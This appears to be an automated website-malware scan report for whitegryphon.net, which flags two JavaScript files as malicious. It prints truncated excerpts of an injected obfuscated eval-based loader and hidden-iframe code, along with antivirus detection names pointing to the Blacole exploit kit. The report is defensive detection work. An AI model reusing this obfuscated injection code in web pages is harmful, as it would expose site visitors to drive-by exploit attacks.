Malware Scanner report for whitegryphon.net

Malicious/Suspicious/Total urls checked: 2/0/15

2 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://www.whitegryphon.net/	200 OK Content-Length: 10984 Content-Type: text/html	clean
http://www.whitegryphon.net/rsc/js/functions.js	200 OK Content-Length: 19624 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function addEvent( elm, evType, fn, useCapture ) { if( elm.addEventListener ) { elm.addEventListener( evType, fn, useCapture ); return true; } else if( elm.attachEvent ) { var r = elm.attachEvent( 'on'+evType, fn ); return r; } else { elm['on'+evType] = fn; return false; } } function setstatus( message ) { window.status = message; return true; } function resetstatus() { window.status ... 3310 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ... 32997 bytes are skipped ... ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports: nProtect JS:Trojan.Iframer.C K7AntiVirus Trojan Emsisoft JS:Trojan.Iframer.C (B) Kaspersky HEUR:Trojan.Script.Iframer Microsoft Trojan:JS/Iframeinject.AB MicroWorld-eScan JS:Trojan.Iframer.C F-Secure JS:Trojan.Iframer.C F-Prot JS/IFrame.QW GData JS:Trojan.Iframer.C Commtouch JS/IFrame.QW BitDefender JS:Trojan.Iframer.C
http://www.whitegryphon.net/rsc/js/rollovers.js	200 OK Content-Length: 9779 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function setupRollovers() { if(!document.getElementsByTagName) { return; } var all_links = document.getElementsByTagName('a'); for(var i = 0; i < all_links.length; i++) { var link = all_links[i]; if(link.className && (' ' + link.className + ' ').indexOf(' rollover ') != -1) { link.onmouseover = mouseover; link.onmouseout = mouseout; } } } function findTarget(e) { var target; if (windo ... 3232 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} Antivirus reports: Qihoo-360 Trojan.Generic Avast JS:Iframe-CWV [Trj] Ad-Aware Exploit.JS.Blacole.BT Ikarus Trojan.Script Panda JS/JavaBlacole.A nProtect Exploit.JS.Blacole.BT K7AntiVirus Exploit ( 04c5558f1 ) Comodo TrojWare.JS.Agent.AM Emsisoft Exploit.JS.Blacole.BT (B) CAT-QuickHeal JS/BlacoleRef.BV K7GW Exploit ( 04c5558f1 ) McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/BlacoleRef.BX Kaspersky Trojan-Downloader.JS.Iframe.czf MicroWorld-eScan Exploit.JS.Blacole.BT Tencent Js.Trojan-downloader.Iframe.Dxmp Fortinet W32/ForeignRansom.583D!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.uvpsi ClamAV JS.Trojan.Blacole-4 F-Secure Exploit.JS.Blacole.BT Avira JS/Blacole.EB.24 AVG HTML/Framer Norman Blacole.HB Sophos Mal/Iframe-AF GData Exploit.JS.Blacole.BT BitDefender Exploit.JS.Blacole.BT
http://www.whitegryphon.net/index.php	200 OK Content-Length: 11019 Content-Type: text/html	clean
http://www.whitegryphon.net/blog3.php	200 OK Content-Length: 11661 Content-Type: text/html	clean
http://www.whitegryphon.net/Fiat850/index.php	200 OK Content-Length: 15457 Content-Type: text/html	clean
http://www.whitegryphon.net/Fiat850/index.php?disp=arcdir	200 OK Content-Length: 10122 Content-Type: text/html	clean
http://www.whitegryphon.net/Fiat850/index.php?disp=catdir	200 OK Content-Length: 10277 Content-Type: text/html	clean
http://www.whitegryphon.net/Fiat850/index.php?disp=comments	200 OK Content-Length: 10614 Content-Type: text/html	clean
http://www.whitegryphon.net/weblog_gallery/v/Fiat850/	500 Internal Server Error Content-Length: 718 Content-Type: text/html	clean
http://www.whitegryphon.net/test404page.js	404 Not Found Content-Length: 282 Content-Type: text/html	clean
http://www.whitegryphon.net/Fiat850/index.php?disp=msgform&recipient_id=3&redirect_to=http%3A%2F%2Fwww.whitegryphon.net%2FFiat850%2Findex.php%3Fblog%3D4%26disp%3Dcomments	200 OK Content-Length: 12298 Content-Type: text/html	clean
http://www.whitegryphon.net/Fiat850/index.php?disp=msgform&recipient_id=3&redirect_to=http%3A%2F%2Fwww.whitegryphon.net%2FFiat850%2Findex.php%3Fblog%3D4%26disp%3Dmsgform	200 OK Content-Length: 12297 Content-Type: text/html	clean
http://www.whitegryphon.net/htsrv/login.php?redirect_to=%2FFiat850%2Findex.php%3Fblog%3D4%26disp%3Dmsgform	200 OK Content-Length: 5623 Content-Type: text/html	clean
http://www.whitegryphon.net/rsc/js/md5.js	200 OK Content-Length: 12203 Content-Type: text/javascript	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: whitegryphon.net

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: whitegryphon.net
Referer: http://www.google.com/search?q=whitegryphon.net

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=whitegryphon.net

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://whitegryphon.net/

Result: whitegryphon.net is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for whitegryphon.net

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools